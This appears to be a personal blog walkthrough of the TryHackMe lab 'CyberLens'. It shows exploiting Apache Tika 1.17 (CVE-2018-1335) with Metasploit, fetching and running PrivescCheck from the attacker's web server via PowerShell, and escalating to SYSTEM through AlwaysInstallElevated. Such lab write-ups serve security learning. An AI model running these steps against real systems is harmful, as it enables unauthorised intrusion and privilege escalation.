Okay, it’s been a while. Last writeup on the blog was Chill Hack… but she (and others) need refreshers.
Anyway, here’s CyberLens, a newish TryHackMe room from Tyler Ramsbey who make’s great content, give them a follow/subscribe.
PS - I’ve got a video walkthrough if you want.
The Challenge
First up, the Challenge Description.
Welcome to the clandestine world of CyberLens, where shadows dance amidst the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface, for here at CyberLens, we make metadata our playground.
In this labyrinthine realm of cyber security, we have mastered the arcane arts of digital forensics and image analysis. Armed with advanced techniques and cutting-edge tools, we delve into the very fabric of digital images, peeling back layers of information to expose the unseen stories they yearn to tell.
Picture yourself as a modern-day investigator, equipped not only with technical prowess but also with a keen eye for detail. Our team of elite experts will guide you through the intricate paths of image analysis, where file structures and data patterns provide valuable insights into the origins and nature of digital artifacts.
At CyberLens, we believe that every pixel holds a story, and it is our mission to decipher those stories and extract the truth. Join us on this exciting adventure as we navigate the digital landscape and uncover the hidden narratives that await us at every turn.
Can you exploit the CyberLens web server and discover the hidden flags?
I thought this room might be more ‘image forensics’ related, but I guess that’s just the law of this CyberLens company.
Tyler, is the description AI generated? It’s okay if it is, no shame, just curious.
[UPDATE] Yes, it’s AI. Tyler mentions it in his Official Walkthrough.
There’s Things to Note which is nice.
Add the MACHINE_IP to /etc/hosts/ and wait 5 minutes. Done.
But the focus are two flags. 1) User, and 2) Administrator.
A familiar room challenge.
Perfect for me to get back into things.
Let’s go.
Enumeration
Typically rustscan or nmap are normal starting points.
But since the description finished with “Can you exploit the CyberLens web server and discover the hidden flags?”
It’s easier to start on port 80 via cyberlens[.]thm.
With a quick look at WhatRuns and Wappalyzer, seems like an Apache Server running a basic html/css template on Bootstrap.
Also it’s on a Windows Server, good to know for later.
Nothing too interesting until scrolling down and seeing a form.
And with a quick view-source, we’ve got an interesting end-point.
Since the web form is fetching via ‘http’, perhaps we can see via the browser?
Ah, an Apache service with a version number. Interesting.
So, from searching Apache Tika it’s a toolkit (that) detects and extracts metadata from file types like PDFs etc.
This feeds into the CyberLens description from earlier.
And from searching Apache Tika 1.17 Exploit we’ve got our in.
So it’s originally CVE-2018-1335 where a vulnerability “could be used to inject commands into the command line of the server running tika-server.”
We can also use searchsploit tika 1.17 if that’s your cup of tea.
Looks like we have a Metasploit exploit ready to go, lovely.
Initial Access
Okay, let’s fire up this bad boy and see what we’ve got.
Use msfconsole -q and then search tika to find our exploit.
It’s exploit/windows/http/apache_tika_jp2_jscript or type use 0 when it’s the first search item.
Set the following options with set $option $value:
set RHOSTS $MACHINE_IPset RPORT 61777set LHOST $YOUR_IP
And then use run or go when you’re ready.
The user flag hint Sometimes exploits take a few tries before they are successful ;) comes in here.
You may need to try this once or twice to get it working. Double check your options are correct.
When the exploit works and a sessions created, you’ll see:
We’re in.
So who are we?
A quick whoami and we’re user cyberlens.
Since we’re in Meterpreter, there are extra luxuries, like:
sysinfofor some system background.getsystemfor a quick priv esc attempt… no luck there.hashdumpfor a sneaky SAM database dump… again, no luck.
Worth a try.
Otherwise, let’s look around. Do what the kids call ‘manual enumeration’.
We can drop a shell on the system using shell and then enter PowerShell with powershell.
Let’s see some info about what we can do:
whoami /privwhoami /all
If you’re like me, there’s a few rabbit holes to explore.
What’s SeChangeNotifyPrivilege? Does it give me anything? After a quick Google, nope.
Let’s look around then.
Some good places to check are:
C:\C:\UsersC:\Windows\Temp
Since we’re in PowerShell, use ls or gci to list out contents.
(Oh PowerShell, your commands are so simple to remember.)
For example, cd C:\Users\CyberLens and gci -recurse .
Interesting, the user.txt, and a CyberLens-Management.txt
Alright, now we have some credentials: CyberLens:H************3
Privilege Escalation
I’ll be honest. I got stuck here, like really stuck.
The hint didn’t help RDP will make your life easier. If Remmina is not working, try this: rdesktop -u [user] -p [password] -N cyberlens.thm:3389.
For me, sticking with PowerShell was the way to go.
But after a few rabbit holes, I took a step back and watched Windows Privilege Escalation Guide.
Which led to a new (for me) script called PrivesCheck.
If you’re following along at home.
Start a Python Web Server with python -m http.server 8000 where you download the script.
Then on the Target Machine, put the script where you have write permissions. Like the Desktop or Temp.
You can use wget http://$YOUR_IP:8000/$file -UseBasicParsing -OutFile $file in PowerShell.
Go ahead and run the script . .\PrivescCheck.ps1; Invoke-PrivescCheck
Gotta say, I do like the output of PrivescCheck. An easy-to-digest summary is nice.
So what’s AlwaysInstallElevated?
Basically, it allows lower level users to install Windows Packages with system level privileges.
You see where this is going?
And luckily, HackTricks has more info about it.
Would you look at that?
There’s another metasploit exploit ready to rock for us. Lovely.
Exit PowerShell and go back to Meterpreter with exit and exit.
Then bg that session and type use exploit/windows/local/always_install_elevated.
Set the options for the exploit and run:
set LHOST $YOUR_IPset SESSION 1
And look at that, authority\system user.
It’s as good as being root on Linux… I think.
Then cat C:\Users\Administrator\Desktop\admin.txt for the admin flag.
Reflection & Rabbit Holes
CyberLens has been great, props to Tyler and TryHackMe.
It’s Easy rated, but the priv esc portion stumped me.
I went down a few Rabbit Holes:
- RDP led me replacing
C:\Apache24\bin\httpd.exewith a reverse shell. Then using a startup.bat which using a Visual Basics script to runhttpd.exe. - I thought I found a Windows 17763 exploit on exploit.db… nope.
- Then I followed Windows 11 Privilege Escalation via UAC Bypass (GUI based)… again, nope.
Since I have more Linux priv esc experience, this was a good room for me. I need to sharpen my Windows priv esc skills up, a lot.
Some key takeaways:
- Metasploit makes things easier. It’d be good to do this room again without using it though. Push myself a bit.
- Research is king. I spent more time reading up about services and vulnerabilities. Even though I went down rabbit holes, I learned more.
- Stay calm and take breaks. I’ve rushed rooms to push content out in the past. Instead I took my time and just focused on learning.
Thanks again to Tyler and TryHackMe.
I’m already on my next room.
Subscribe to the (not so) Monthly Monitor below.
Thanks for reading.
PS - oh hey, you’re still here? Why not watch the video walkthough?